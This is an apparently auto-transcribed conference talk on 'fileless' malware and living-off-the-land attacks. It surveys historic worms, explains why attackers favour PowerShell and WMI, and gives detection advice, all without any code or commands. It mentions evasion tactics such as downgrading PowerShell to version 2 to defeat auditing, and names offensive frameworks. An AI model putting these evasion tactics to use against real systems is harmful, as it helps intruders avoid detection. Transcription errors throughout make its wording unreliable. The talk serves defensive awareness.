Fileless malware -Jim Van De Ryt

next we have Jim and he is going to talk about some current trends on living off the land and this is fireless malware let's give him a hand okay just making sure that mic one mic is off and the other one is on so otherwise gonna have some bad feedback too baby I been doing the cybersecurity or what yous called information security for about 18 years different work for customer done reseller done vendor currently worked for a vendor so just as a heads up this is very just informational about what's going on right now can you guys hear me okay so so so so okay there we go so we'll go through the agenda we'll

just go through what typically traditional malware was concerned and now what's called fireless malware file is malware is kind of a BS industry term it's literally for whatever reason got tagged to be file as malware versus like once you're in an environment using tools that are already there aka living off the land okay so but if you research it you go to dark reading and you want to find out something about it or one of those other websites with good info files malware is what you look for okay so we'll go through a little bit of history some newer variants talk about what the current trend is for living off the land by attackers and

that kind of detecting some of it from the current tool set that you have in your environment so of course you got to do the dictation Wikipedia definition here traditional where for most people think would be have a executable associated with it although fireless malware goes back quite far and then if you were in brian satirist talk before he talked about powershell and going all the way back to using VBS with the i-love-you virus i didn't quite go back that far in the history but 2001 so a couple year different but Philo's malware is literally usually defined by a few things okay no files usually it does one of a few things it exploits a

vulnerability and that's what used to happen very frequently with you know that's why ids/ips was born and it would like advantage of a vulnerable operating system or application in fact that maybe reside in memory and that's quote file us or plant itself in the registry for persistence perhaps again quote file us so these kind of definitions are what make it quote file as malware if you guys have questions please don't wait to the end just raise your hand okay so I did some research on this actually when I started here here this company about six months ago I was told I had to be give a talk to 158 people at the North Texas Issa and I had to come up with the

subject was relevant to what was happening in the industry today so I did some research and I come across this dark reading article published in December around file is malware I'm like what is Phi literally what is files malware was my question so I did a lot of research into it and dug into several sources and found out that there's some general consensus between 50 and 60 percent of all malware and 2017 and the key pieces ere is that the second half of the year was really when it took off and the only reason that file is malware quote files malware exists or living off the land is to evade detection so once you do get into

an environment rather than downloading something that has an IOC hash match or command and control domain or URL that your current controls can catch or that you can Det detonate in and malware sandbox or whatever it might be it's just another way to get around current controls the key piece about that is is there's not a whole lot of IOC that are left behind if you ever use PowerShell or used this management instrumentation command line nothing really is left behind - fine unless you are watching it during it happening so we'll dig into a little bit of this this is the very very abridged history of file as malware so who can tell me why

Code Red and back in 2001 is called Code Red yep yeah that's correct yeah actually yeah it was a company called AI partners back in the day that was a threat that Ike did a lot of antivirus D compilation and investigation on viral what was happening in the virus space the vulnerability exploitation that kind of thing and they actually named it this because they were drinking Code Red anyway it's one of the farthest back ones and Brian steer did bring up at the i-love-you virus which was VBS 2000 this about that same time there were a lot more scripting things that took advantage of a vulnerability not necessarily came in an email although I love you was one of the first ones with

that said Code Red was an interesting thing because it was one of the first real worms out there that got loose what it would do is it would take advantage of a vulnerable iis server and back then they weren't behind a firewall oftentimes right on the internet without much protection and they would take advantage of that vulnerability and it would create 99 threads to exploit additional IP addresses on the internet so to spread itself to wherever it could find on the Internet and then it would deface the webpage boy we could just go back to the days when all you had to worry about web face to page web face webpage defacement I don't know if you

guys remember back in the day when this this was one of the web face the web page to face mints was Air Tran Aaron had a plane go down and they with this somebody defaced her website and it's kind of I guess he the hacker humor at the time had two plane going down in flames and people on fire falling out of the plane so they tried to you know kill the brand or whatever it might be sequel slammer was a unique one I remember back in the day this one was almost impossible to stop was a concept at blackhat for a buffer overflow in Microsoft sequel and actually somebody used it and did something with it the

unique part about it was is it was a one packet UDP attack and there's nothing I don't think today even still how are you gonna stop that there's no session even in ids/ips in one packet goes right by it so it's very difficult to stop but backed up here that I got off the internet said seventy-five thousand machines in ten minutes but it was actually every single machine that was vulnerable on the internet happened in under 11 minutes so very fast spreading worm so some of the fast faster spreading pieces now we're gonna fast forward because otherwise we'll be here all day so Pollux is a more modern still not really the most modern but more modern

type of quote file as malware this one did use a vulnerability and you'll notice is we get newer and newer they're not using vulnerabilities to to get into the organization they're using more more along the lines of phishing emails and that type of thing to get in the organization but this one did exploit a remote privilege escalation vulnerability and the cool part about it was for the first time it used unreadable Unicode characters in the registry so why the registry could interpret it the humans could not and so it was a good way to hide itself also if you anytime you double clicked on a folder open a folder it would that was this one of its persistence

mechanisms and also had a watchdog stuff that typical mallet where does today but this is one of the ones in the quote file is from aka registry entries that was what this is one of the first ones that did that you guys have probably seen this before before and somewhere there were screen lockers so copter copter started out as a screen locker and quotes care where to try and get people to give them you know enter some sort of money much like ransomware to unlock your screen copter has evolved it started out as a pretty normal this is almost all it did copter has actually really been used more recently and ransomware and there's a lot of updates that it's posing as

update so for Chrome Firefox whatever it might be and for a while it was used for malvert izing so pretty flexible piece of quote file a soft malware out there it's still around today is ransomware and then let's fast forward to 2017 some of this we're starting to be developed in 2016 and this is being used pretty extensively you'll notice one thing about every single one of these find one word that's the same in all four of these that's right living off the land what what is in the environment so another piece is is there's another word in three of them yeah macro evil macro well you know the idea here is that when you do you have a

macro the compiled hash still looks like the word or Excel or whatever it is but the macro can contain some bad code in it and be launched so usually what these do is they come in as a map in the side of a macro they launch PowerShell into memory and then they do your dirty work unusually they get in by a phishing attack one of the interesting ones power wear is a really unique way to use PowerShell to encrypt the entire system for a quote ransomware this is not one usually used to encrypt and then ask for money it usually used to encrypt and make it forensic ly inaccessible because it is a script that's downloaded to encrypt the

machine power where is as a result you know usually there's an anything left to pop up anything on the screen or send you an email or whatever to tell you that there give me to give me money to unencrypted your machine August was a unique one and this is a you know they're always trying to obfuscate the data whether it's base64 encoding used on the PowerShell with PowerShell or XOR encoding or whatever it might be or compression used a PowerShell byte array which PowerShell interprets just fine everything's good there but if you've ever looked at a byte array to the office gate that takes some considerable time to find out what the real command was so that was pretty unique parsed by

which also if you did go to Brian was it cetera cetera yeah Duchin he also talked about posh by one of unique things about this one is it started using WMI we didn't see this a whole lot just the PowerShell is more is really ubiquitous and almost all Windows environments back to what I think it's Windows Server 2003 I think it is so that was that's what still is most commonly used with fireless malware but WMI is starting to pop up a lot more and we'll talk about that in a little bit any questions so far okay we'll go over why PowerShell is currently the tool of choice for living Elfland like we talked about it's

everywhere it's generally trusted because used by sis admins to get the job done another one is is that it's easy to downgrade nobody's watching a downgrade of PowerShell version 3 and version 5 both have auditing capabilities and you can go get download there's a couple of guides turning on auditing to be able to audit for bad stuff happening in PowerShell but if the attacker downgrades into version 2 it wipes out auditing completely and that's usually one of the first things they'll do if they find version 3 or 5 now you can't monitor the system to watch for the downgrade that's another thing you might want to do ok it's also stealthy it can load a couple of different ways

load directly into memory as we talked about another pieces is the system automation DLL which is commonly used in environments does not even show up in task manager it's doesn't show up as a service so when it does load into memory even if you did a process listing it's not there and it's you know this is these are normal tools that your system is used ok this is not the bad guys doing anything awful what's your sir using what exists in the environment like we talked about doesn't leave many artifacts behind is encrypted between machines that's another piece and let me go ahead and through here real quick often off you skated in some way as a

script can be a C script W script lots of different ways you can get PowerShell to do your bidding if you use an application whitelisting tool you know there's not a whole lot of granularity PowerShell runs or doesn't and I'm not a genius and application whitelisting tools so there might be some granularity in some products out there or solutions then the key pieces is just to avoid current controls if you think about it if I send a phishing email and it's embedded in a macro I dump it into memory you know that's obviously security awareness training that failed somebody double clicked on the macro enabled it dumped it into memory the key piece there is everything that

PowerShell does that the command line is txt it's not downloading any executables that would normally be an IOC pickup from additional maybe maybe ids/ips maybe the firewall whatever it is even in a malware sandbox what are you going to detonate in the sandbox there's no executable it's text you know so isn't really something that is it's meant to avoid current controls and it's often overlooked you know because this happens it's been the reign of sister admins forever and it does a great job getting the operations part of the organization's work done and then the key piece here too is another one which is again this is where I'm showing you all stuff that we built to help us

including these entire PowerShell frameworks and there's more out there but red teams have created these and for good I mean a lot of these ok I'm a field engineer I am NOT a reverser of Mauer I can float up PS attack and it's just a menuing system man I mean if I can do this anybody can okay I mean power sploit PowerShell Empire they're all super easy to use and so the bad guys of course you know it's easy to use why not use that too so why is it so popular now just because it avoids controls it avoids the risk of being caught the attacker doesn't want to be caught so it doesn't generate IOC s

generally doesn't need IOC s to install or get there do do much of anything it's usually really flexible allows you to do many different things in the environment so if one thing you do fails so what go to back to the PlayBook do another one keep trying keep trying keep trying I'm not leaving any artifacts behind I'm not downloading executables I'm just trying new things that probably will go unnoticed if auditing isn't turned on or you don't have something monitored during it so let's talk about detecting fireless malware so there's some basics usually it's pretty abnormal for PowerShell to run out of the temp directory or anything of that nature this does happen fairly normally

download and execute string so download string and execute but usually that with cyst admins when they do it they might download it but it takes a little while for them to execute if it's a bad guy it's almost download string and almost immediate execute if they do download something that it's file based oftentimes there's office keishon base64 X oaring compression something that nature and oftentimes if you if you don't have you don't normally use C script or W script etc any kind of scripting language for PowerShell you can talk to your sis have ins about this that's probably not your sis happens doing it ok so that's just another way to catch up if they are using the

PowerShell automation DLL normally thank you so much for the ten minute warning it's almost beer bureau o'clock so and I know you I'm standing between you guys and beer so we've got a few more slides here if they are using the PowerShell automation DLL sysadmin czar you can ask them a not to use it or B use it under certain circumstances okay since it does not show up loads and memory does not show up in task manager it's not show up in the process listening you can also watch for persistence if a PowerShell script is using MSHDA or HTA that is not your sis Atman I can tell you that right now that is highly highly highly unlikely if

they're using invoked expressions like for a framework for Metasploit not probably not your system at ok using javascript engines probably not your sister admin doing these are persistence mechanisms a lot of time ok so we're almost done here it's interesting those 56 percent on average okay I did a lot of research on the web so I just took a bunch of articles and somewhere 48 percent somewhere 60 some-odd percent somewhere 50 percent I came up with 56 percent from full sources in 2017 and 2018 so far 60% which doesn't seem like a huge increase over file based malware but it's actually just shifting the playing field so PowerShell was all the rage in 2017 and 2018 and I think that's why we had

the advent of the mitre attack framework to February's ago so 16 ish months ago was around you know living off the land what people were doing internally once they do get in and we've seen a lot of uptick and you can google this it's all out there's all research I just did on the Internet WMI are windows management instrumentation seems to be the big one now because you guys are getting smarter you're turning on auditing for PowerShell version 3 and 5 you're monitoring but if it's being downgraded you're working with your sis admins about W script C script you know you getting smarter and so to evade detection they're just moving to another powerful tool in your environment to get

the job done and you know who knows what's next maybe it's an old net cat maybe it's you know other things that reside on Windows that they're gonna start using but the idea here is is that this is a problem now that's a current trend I mean and it's not gone away so it's just something to be aware of this is an awareness type thing so that's it any questions yeah

but you mentioned both correct as along looking at that process so something coming

yeah if you're looking like tactics techniques and procedures TTP's I mean you have something to do that this is an easily these are much more easily stoppable okay since they don't generate really any artifacts that is why IO Caesar not not useless necessarily but just less much less use useful than normal so you're right

exactly it's a being really catching people living off the land is all about tactics techniques and procedures generally monitoring that and being able to you know catch them doing it when they're doing it generally yes sir

other yeah there are some since monitoring tools that you from Microsoft that in there third-party ones to you can you know use in your environment literally just to monitor version changes I will tell you that I've seen a couple customers distance is not a problem it's just sometimes sysadmin they don't want to modify their scripts so they will actually downgrade from version 3 or 5 to version 2 to get it to run and then maybe upgrade it again so if you see that I'm where I'm going with this is we're all up or you know yeah it's it's just something to be aware but there are some monitoring tools you can use to do that today so it's another way of just

you know keep an eye on things what's going on in my environment awareness

their commands to debate well yes and no the whole reason obfuscation jeez logically is to evade detection of any kind of monitoring or auditing tool so if you use turn auditing on version 3 or 5 you can monitor for obfuscation which usually you're said means don't use yes you could but the auditing would pick that up probably with you configure auditing correctly via some guides on the internet meaning like okay it does it does download string and execute in like one second that's pretty unusual for and that's this admin to do or you know a couple other things they're using utilizing MSHDA or HDA you know those kind of things in audit so but now

that's a good question like yeah because things progress

or uses as a lure yeah you aren't that's a quote on office gated section of the stuff is a lure thinking you've got them and then there might be something else it's a reference later that is actually the bad part yep I agree no you're right I mean it's a cyclical pattern seems to go up and down alright it's beer o'clock people thanks for your time [Applause]